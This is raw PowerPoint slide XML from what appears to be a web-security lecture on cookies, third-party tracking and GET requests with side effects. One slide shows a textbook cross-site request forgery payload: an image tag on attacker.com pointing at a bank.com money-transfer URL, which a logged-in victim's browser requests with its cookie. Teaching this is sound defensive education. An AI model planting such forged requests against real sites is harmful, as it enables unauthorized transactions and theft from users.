            <a:pPr marL="302259" indent="-302259" algn="l" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2592"/>
            </a:pPr>
            <a:r>
              <a:t>This value should only be readable by any domain ending in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.zdnet.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="302259" indent="-302259" algn="l" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2592"/>
            </a:pPr>
            <a:r>
              <a:t>This should be available to any resource within a subdirectory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/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="302259" indent="-302259" algn="l" defTabSz="420624">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2592">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Send the cookie with any future requests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&lt;domain&gt;/&lt;path&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674055" y="2441563"/>
            <a:ext cx="1343393" cy="256402"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34772"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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9" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973568" y="2441563"/>
            <a:ext cx="4519276" cy="256402"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34772"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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0" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9326907" y="2428863"/>
            <a:ext cx="2210855" cy="256402"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34772"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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1" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8502761" y="2441563"/>
            <a:ext cx="864820" cy="231002"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 38596"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="accent5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 spc="-22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2" name="Semantics"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7562894" y="3424544"/>
            <a:ext cx="224895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Semantics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6" animBg="1" advAuto="0"/>
      <p:bldP spid="587" grpId="1" build="p" bldLvl="5" animBg="1" advAuto="0"/>
      <p:bldP spid="588" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="589" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="590" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="591" grpId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Requests with cook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Requests with cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="595" name="Screen Shot 2014-02-18 at 3.27.40 AM.png" descr="Screen Shot 2014-02-18 at 3.27.40 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect b="62032"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2175255" y="2705070"/>
            <a:ext cx="8324852" cy="173999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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="598" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6142280" y="4565094"/>
            <a:ext cx="4300524" cy="720241"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4300523" cy="720240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="596" name="Arrow"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-1" y="-1"/>
              <a:ext cx="720242" cy="720242"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 32000"/>
                <a:gd name="adj2" fmla="val 85333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7" name="Subsequent visit"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="756590" y="61670"/>
              <a:ext cx="3543934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Subsequent visit</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="602" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2214078" y="5340263"/>
            <a:ext cx="8649123" cy="2763829"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="8649121" cy="2763828"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="599" name="Screen Shot 2014-02-18 at 5.23.02 AM.png" descr="Screen Shot 2014-02-18 at 5.23.02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576644" cy="2763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0" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="696110" y="2375143"/>
              <a:ext cx="4151339" cy="256401"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 34772"/>
              </a:avLst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1" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4881512" y="2375143"/>
              <a:ext cx="3767610" cy="256401"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 34772"/>
              </a:avLst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03" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394395" y="3511520"/>
            <a:ext cx="85691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00 0.022857" pathEditMode="relative">
                                      <p:cBhvr>
                                        <p:cTn id="6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2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Why use cooki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use cookies?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="Session identifi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Session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>After a user has authenticated, subsequent actions provide a cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>So the user does not have to authenticate each time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:def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Personalization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Let an anonymous user customize your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="740833" lvl="1" indent="-296333">
              <a:defRPr sz="2400"/>
            </a:pPr>
            <a:r>
              <a:t>Store language choice, etc., in the cookie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1" build="p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Why use cooki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use cookies?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="609" name="Tracking users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11099800" cy="3558177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3348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Tracking users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826769" lvl="1" indent="-413384" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3348"/>
            </a:pPr>
            <a:r>
              <a:t>Advertisers want to know your behavior</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826769" lvl="1" indent="-413384" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3348"/>
            </a:pPr>
            <a:r>
              <a:t>Ideally build a profile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across different websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826769" lvl="1" indent="-413384" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3348"/>
            </a:pPr>
            <a:r>
              <a:t>Visit the Apple Store, then see iPad ads on Amazon?!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="826769" lvl="1" indent="-413384" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr sz="3348"/>
            </a:pPr>
            <a:r>
              <a:t>How can site B know what you did on site A?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Site A loads an ad from Site C…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272668" y="7303639"/>
            <a:ext cx="6608491" cy="16510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419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Site A loads an ad from Site C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Site C maintains cookie DB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3400"/>
            </a:pPr>
            <a:r>
              <a:t>Site B also loads ad from Site C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="611" name="Group"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7183404" y="7309989"/>
            <a:ext cx="5811328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419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="-"/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“Third-party cookie”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="419805" indent="-419805" algn="l">
              <a:buSzPct val="75000"/>
              <a:buChar char="-"/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Commonly used by large</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>ad networks (doubleclick)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="http://live.wsj.com/video/how-advertisers-use-internet-cookies-to-track-you"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3083712" y="9335709"/>
            <a:ext cx="683737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http://live.wsj.com/video/how-advertisers-use-internet-cookies-to-track-you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1" animBg="1" advAuto="0"/>
      <p:bldP spid="611" grpId="2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URLs with side eff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URLs with side effects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="GET requests often have side effects on server state…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579446" y="2977678"/>
            <a:ext cx="11845908" cy="5912322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>GET requests often have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side effects on server state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Even though they are not supposed to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>What happens if </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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user is logged in</a:t>
            </a:r>
            <a:r>
              <a:t> with an active session cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>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request is issued for the above link?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:t>How could you get a user to visit a link?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="http://bank.com/transfer.cgi?amt=9999&amp;to=attacker"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788352" y="2273696"/>
            <a:ext cx="9428095" cy="4603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500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="rId3"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://bank.com/transfer.cgi?amt=9999&amp;to=attacker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ounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859358" y="3390534"/>
            <a:ext cx="2450901" cy="3347358"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13333"/>
            </a:avLst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The web, basicall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web, basically</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="427" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114815" y="3467740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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949999" y="3467740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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="Database"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205616" y="5622463"/>
            <a:ext cx="1428751" cy="1032570"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18449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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488517" y="2830161"/>
            <a:ext cx="11925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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="431" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694541" y="3390534"/>
            <a:ext cx="2450901" cy="3347358"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13333"/>
            </a:avLst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Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8251806" y="2830161"/>
            <a:ext cx="13363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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8919991" y="4952590"/>
            <a:ext cx="1" cy="61377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34" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5023594" y="4182116"/>
            <a:ext cx="2957613" cy="1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35" name="(Private)…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370433" y="5622463"/>
            <a:ext cx="1428751" cy="1032570"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18449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t>(Private)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Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4084808" y="4952590"/>
            <a:ext cx="1" cy="61377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37" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5326558" y="5089887"/>
            <a:ext cx="2351684" cy="1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38" name="DB is a separate entity,…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6021355" y="6981275"/>
            <a:ext cx="63753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DB is a separate entity,</a:t>
            </a:r>
          </a:p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logically (and often physically)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="439" name="(Much) user data is…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288368" y="6981275"/>
            <a:ext cx="438325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(Much) user data is</a:t>
            </a:r>
          </a:p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part of the browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148111747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 advAuto="0"/>
      <p:bldP spid="428" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="429" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="433" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="434" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="435" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="436" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="437" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="437" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="438" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="439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Exploiting URLs with side effects"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820238" y="405891"/>
            <a:ext cx="11364324" cy="2159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Exploiting URLs with side effects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="696" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2104545" y="3503734"/>
            <a:ext cx="1365917" cy="2007901"/>
            <a:chOff x="287035" y="-55562"/>
            <a:chExt cx="1365915" cy="2007900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="694" name="Browser"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="287035" y="523587"/>
              <a:ext cx="1365916" cy="1428751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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="695" name="Client"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="373702" y="-55563"/>
              <a:ext cx="119258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Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="697" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3842446" y="3156288"/>
            <a:ext cx="5014905" cy="1114725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98" name="bank.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9225639" y="5741435"/>
            <a:ext cx="1939987" cy="142875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  <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="701" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3838749" y="3527336"/>
            <a:ext cx="5018602" cy="2062161"/>
            <a:chOff x="0" y="-9916"/>
            <a:chExt cx="5018601" cy="2062159"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="699" name="&lt;img src=“http://bank.com/transfer.cgi?amt=9999&amp;to=attacker”&gt;"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20828879">
              <a:off x="54561" y="524276"/>
              <a:ext cx="4915083" cy="993776"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFF200">
                <a:alpha val="28000"/>
              </a:srgbClr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20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&lt;img src=“http://bank.com/transfer.cgi?amt=9999&amp;to=attacker”&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="700" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="5014906" cy="111472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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="704" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3578051" y="5591712"/>
            <a:ext cx="5278283" cy="1892380"/>
            <a:chOff x="-261715" y="0"/>
            <a:chExt cx="5278281" cy="1892378"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="702" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="5016568" cy="1221058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03" name="http://bank.com/ transfer.cgi?amt=9999&amp;to=attacker"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="797512">
              <a:off x="-251443" y="627315"/>
              <a:ext cx="5118920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20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>
                  <a:hlinkClick r:id="rId5"/>
                </a:rPr>
                <a:t>http://bank.com/</a:t>
              </a:r>
              <a:r>
                <a:t/>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>transfer.cgi?amt=9999&amp;to=attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="705" name="attacker.com"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9225639" y="2976555"/>
            <a:ext cx="1939987" cy="142875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8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attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Browser automatically…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762933" y="7308863"/>
            <a:ext cx="5023185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Browser automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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visits the URL to obtain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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it believes will be</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>an image</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="710" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="904236" y="4433291"/>
            <a:ext cx="1179502" cy="875547"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1179501" cy="875546"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="707" name="Cookie"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="381982" y="499680"/>
              <a:ext cx="797520" cy="375867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 31948"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId7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12700" dist="127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200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Cookie</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="708" name="bank.com"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="981970" cy="375867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 31948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1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bank.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="715" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="139377" y="378883"/>
              <a:ext cx="295731" cy="46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1" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="19751" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4582" y="20125"/>
                    <a:pt x="-1849" y="12925"/>
                    <a:pt x="457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711" name="Cookie"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="774622">
            <a:off x="6530940" y="7169864"/>
            <a:ext cx="797520" cy="375868"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 31948"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="12700" dist="127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Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="714" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10213947" y="4471274"/>
            <a:ext cx="864119" cy="1204194"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="864118" cy="1204192"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="712" name="Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="-1"/>
